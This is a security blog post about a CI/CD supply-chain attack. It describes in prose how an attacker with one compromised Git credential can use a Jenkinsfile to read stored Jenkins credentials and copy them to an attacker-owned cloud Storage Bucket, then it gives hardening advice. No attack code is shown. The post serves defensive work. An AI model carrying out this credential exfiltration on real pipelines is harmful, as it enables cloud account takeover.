CI/CD supply chain attacks for data exfiltration or cloud account takeover

The modern enterprise considers its CI/CD pipeline one of its most critical assets. However, the need to support developers in rapid tool exploration and iteration often drives devops teams to be fairly loose with repository and build controls. The great challenge of securing CI/CD lies in the nature of the beast. Building arbitrary code and CI/CD scripting tools grant the attacker RCE from the get-go. In this blog we examine a fairly robust architecture, how to break it, and how to further harden the design.

Our model is a security conscious enterprise with build services hosted in their datacenter but deployment to the cloud. Initially there may be lots of developers with commit permissions to the repo and little control over source code or container lineage. Given the recent Dockerhub breach, the security team wants to take steps to harden their system against supply chain attacks or the blast radius of a developer token or laptop compromise.

The security team has implemented the following changes:

· Git hooks are required to prevent accidental credential check-ins for all repositories.

· Developers are granted wide permissions to create repositories and build in a dedicated dev build project using Cloud Build. Containers are assumed to be malicious but cordoned to their own projects or GCP build infrastructure.

· All commits to repos which can enter stage or dev environments require Dockerfiles with approved lineages (FROM <trusted whitelist>) and approval of 1 or more developers to merge.

· All secrets used in build jobs are managed by the Jenkins administrators. Secrets are securely passed to the administrators who input them into Jenkins cred manager and only permit them to be read by the repos which require them.

· Networking egress is locked down from build agents, only whitelisting GCP Services like Storage and Container Registry

Taken together, the architecture looks like this:

We will now break this.

Jenkinsfile Credentials Attack

Assume an attacker has compromised write permissions to a GitHub repo by the Dockerhub breach or a phishing attack leading to developer laptop compromise. Our attacker wishes to escalate privilege by obtaining credentials stored by the Jenkins server.

Jenkins builds are triggered on commits to feature branches in the source repo and Jenkins agents run the Jenkinsfile found in the repo. A reviewer is not required on pushes, only on a merge requests, so the single Git credential will get code execution on Jenkins. Secrets are managed with Jenkins credentials manager. Below is a sample Jenkinsfile snippet.

The attacker is only interested in credentials for staging or production, having deemed the dev environments are a dead end. But the attacker only has one git credential. However, the Jenkins credentials manager has another, used to tag releases and such. If this credential is not protected and it is not a granularly scoped token, then the attacker can then create the commit with the Jenkins Git compromised credential and approve it with their developer compromised credential.

Allowing developers to design the build pipeline via a Jenkinsfile is a great benefit, but here that convenience of a Jenkinsfile controlled by an attacker will be leveraged. The attacker knows that the build infrastructure is likely to put artifacts in Storage Buckets and therefore will be whitelisted, even though exfiltrating to the internet at large is blocked by network egress rules. The attacker simply stores the credentials obtained in the Jenkinsfile stage and exports it to their own Storage Bucket.

Mitigation for Jenkinsfile Credentials Attack

The problem here is that the Jenkins credentials manager is supplying Jenkins jobs with permanent credentials. Because a Jenkins job is low trust, every job should refresh the token with a short timeout and over-write the credential. Use a seed job to wrap the Jenkinsfile in a pre-Jenkinsfile step which generates a new service account key, and inject only that into the environment. Then delete the key on a post-Jenkinsfile step. With gcloud, the key does not have an expiry, but with the Rest API, short expiry can be set as an added protection in case the post job fails to run.

Although this helps reduce the utility of exporting credentials, the attacker still has use of the creds for the duration of the build step. An even better solution would be to use Hashicorp Vault to get full auditing of secrets and advanced features like dynamic secrets and one time use secrets. The goal would be to end up so that the attacker can only use the credentials if they cause the build to fail (by blocking re-use of run-specific creds), thus alerting administrators.

Another way to block exfiltration is extending Google Private Access to the Datacenter. See the link below and my GCP Service Controls to prevent data exfiltration blog.





Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

🕵🏻‍♂️ New Airdrop: Survive

Backup — The panacea for computer viruses and ransomware.

Healthcare Cybersecurity: Reducing the Risk of Data Breaches

New airdrop: MetaPlan (NFTs) Total Reward: 1,000 NFTs ($50,000) Rate: ⭐️⭐️⭐️⭐️ Winners: 950 Random…

Benefits of ISO 9001 and 27001 for Companies and Their Clients

Fight Return Fraud With These Three Strategies

The CIA Triad

Source: IBM

Hodlnaut Goes LUNA-tic! Earn Up To A Free $290 Bonus!

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Kesten Broughton

Kesten Broughton

More from Medium

Integrating Gauge Framework with AWS: Part 2

What is CI/CD? — A 30,000 foot view

CI/CD Overview

Active Directory With Fail-Over Replication on Google Cloud Platform

Multi-Project Pipeline using Gitlab CI